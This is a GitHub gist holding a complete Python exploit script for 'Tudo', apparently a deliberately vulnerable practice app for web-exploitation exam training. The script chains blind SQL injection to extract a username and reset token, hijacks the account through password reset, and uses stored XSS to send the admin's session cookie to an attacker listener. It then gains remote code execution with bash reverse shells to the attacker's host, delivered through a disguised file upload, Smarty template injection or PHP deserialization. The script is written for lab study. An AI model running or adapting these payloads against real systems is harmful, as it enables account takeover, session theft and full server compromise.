Skip to content

Instantly share code, notes, and snippets.

@cyberheartmi9

cyberheartmi9/Tudo-exploit.py

Last active September 1, 2023 12:59
Show Gist options
  • Save cyberheartmi9/93b36f6212e7289e81a897c18b07f32f to your computer and use it in GitHub Desktop.
Save cyberheartmi9/93b36f6212e7289e81a897c18b07f32f to your computer and use it in GitHub Desktop.
Download ZIP
Tudo Exploit OSWE Like Machine : https://github.com/bmdyy/tudo/tree/main
Raw
Tudo-exploit.py
import requests
import sys
import re
import random
import string
import socket
import time
proxies={"http":"127.0.0.1:8080"}
banner="""
████████╗██╗ ██╗██████╗ ██████╗
╚══██╔══╝██║ ██║██╔══██╗██╔═══██╗
██║ ██║ ██║██║ ██║██║ ██║
██║ ██║ ██║██║ ██║██║ ██║
██║ ╚██████╔╝██████╔╝╚██████╔╝
╚═╝ ╚═════╝ ╚═════╝ ╚═════╝
@intx0x80
"""
host='0.0.0.0'
svcport=80
sess=requests.Session()
adminsess=requests.Session()
def sql_inj(ip,inj_query):
for i in range(32,126):
#
data={"username":"%s"%(inj_query.replace("[CHAR]",str(i)))}
req=requests.post("http://%s//forgotusername.php"%ip,data=data)
if "User exists!" in str(req.text):
return i
return None
def extract_data(ip,inject_query):
extracted=""
for j in range(1,60):
inject="admin' and (select ascii(substring((%s),%d,1)))=[CHAR] --"%(inject_query,j)
ret_value=sql_inj(ip,inject)
if ret_value:
extracted+=chr(ret_value)
extract_chars=chr(ret_value)
sys.stdout.write(extract_chars)
sys.stdout.flush()
else:
#print("\nFinish\n")
break;
return extracted
def resepassword(ip,username):
data={"username":str(username)}
req=requests.post("http://%s/forgotpassword.php"%ip,data=data)
if "Email sent!" in req.text:
print("\n[+] Reset token for %s"%username)
def change_password(ip,token,passowrd):
data={"token":str(token),"password1":str(passowrd),"password2":str(passowrd)}
req=requests.post("http://%s/resetpassword.php"%ip,data=data)
if "Password changed!" in req.text:
print("\n[+] Password changed to %s"%passowrd)
def send_xss(ip,lhost):
data={"description":"<script>document.write('<img src=http://{}/'+document.cookie+' />');</script>".format(lhost)}
login=sess.post("http://%s/profile.php"%ip,data=data)
if "My Profile:" in login.text:
print("[+] XSS payload send ..")
return True
def login(ip,username,passowrd):
data={"username":str(username),"password":str(passowrd)}
login=sess.post("http://%s/login.php"%ip,data=data,allow_redirects=False)
if login.status_code==302:
#print("Login Success ")
return True
def server(host,lport):
#
so = socket.socket()
so.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
so.bind((host,lport))
so.listen()
print("[*] Server Running...")
(handler, conn) = so.accept()
data = handler.recv(4096)
cookies=data.split(b"HTTP")[0][5:].decode("UTF-8")
return cookies
# WAY 1 File Upload to Gain RCE
def upload_shell(ip,pwn,admincookie,lhost,lport):
payload = "GIF87a;<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'\");?>"%(lhost,lport)
file = {
'image':('%s.phar'%pwn,payload,'image/gif'),
'title':(None,pwn)
}
adminsess.cookies.set("PHPSESSID",str(admincookie))
req = adminsess.post("http://%s/admin/upload_image.php"%ip,files=file,allow_redirects=False)
if "Success" in req.text:
print ("[+] upload shell Done !")
return True
#WAY 2 Exploit SSTI smarty of Gain RCE
def SSTI(ip,admincookie,lhost,lport):
#
data={"message":"{php}exec(\"/bin/bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'\");{/php}"%(lhost,lport)}
adminsess.cookies.set("PHPSESSID",str(admincookie))
req=adminsess.post("http://%s/admin/update_motd.php"%ip,data=data)
if "Message set!" in req.text:
print("[+] Send SSTI payload")
return True
def trigger_ssti(ip):
print ("[+] Trigger SSTI Check your listener :) ")
req=adminsess.get("http://%s/index.php"%ip)
if "admin Section" in req.text:
return True
def shell(ip,filename):
#
url="http://%s/images/%s.phar"%(ip,filename)
print ("[+] Check your listener :) ")
req=adminsess.get(url)
#WAY 3 php deserialize vulnerability to gain RCE
# https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf
def evil_serialize(ip,admincookie,filename,lhost,lport):
#
full_path="/var/www/html/"+filename
lpath=len(full_path)
data="<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/%s/%d 0>&1'\");?>"%(lhost,lport)
ldata=len(data)
serialize_payload='O:3:"Log":2:{s:1:"f";s:%d:\"%s\";s:1:"m";s:%d:\"%s\";}'%(lpath,full_path,ldata,data)
adminsess.cookies.set("PHPSESSID",str(admincookie))
param={"userobj":serialize_payload}
req=adminsess.post("http://%s//admin/import_user.php"%ip,data=param,allow_redirects=False)
if "index.php" in req.headers.get("Location"):
#print("OK")
return True
def Trigger_shell(ip,filename):
print("[+] trigger serialized shell :) ")
req=requests.get("http://%s/%s.php"%(ip,filename))
def main():
if len(sys.argv) != 4:
print(banner)
print ("(+) usage: %s <target> <LHOST> <LPORT> " % sys.argv[0])
print ('(+) eg: %s 172.17.0.2 172.17.0.2 443' % sys.argv[0])
sys.exit(-1)
ip=sys.argv[1]
lhost=str(sys.argv[2])
lport=int(sys.argv[3])
# select username from users where uid=2
print(banner)
pwn = ''.join(random.choice(string.ascii_letters) for _ in range(5))
password=''.join(random.choice(string.ascii_letters) for _ in range(8))
#username="user2"
print("[+] Extract Username")
username=extract_data(ip,"select username from users where uid=3")
resepassword(ip,username)
token=extract_data(ip,"select token from tokens where uid=3 limit 1")
change_password(ip,token,password)
if login(ip,username,password):
#
print ("[+] Login Success :)")
send_xss(ip,host)
session=server(host,svcport).split("=")[1]
#if upload_shell(ip,pwn,session,lhost,lport):
# shell(ip,pwn)
#if SSTI(ip,session,lhost,lport):
# time.sleep(10)
# trigger_ssti(ip)
if evil_serialize(ip,session,'%s.php'%pwn,lhost,lport):
print("[+] Send serialize payload ")
Trigger_shell(ip,pwn)
if __name__ == "__main__":
main()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment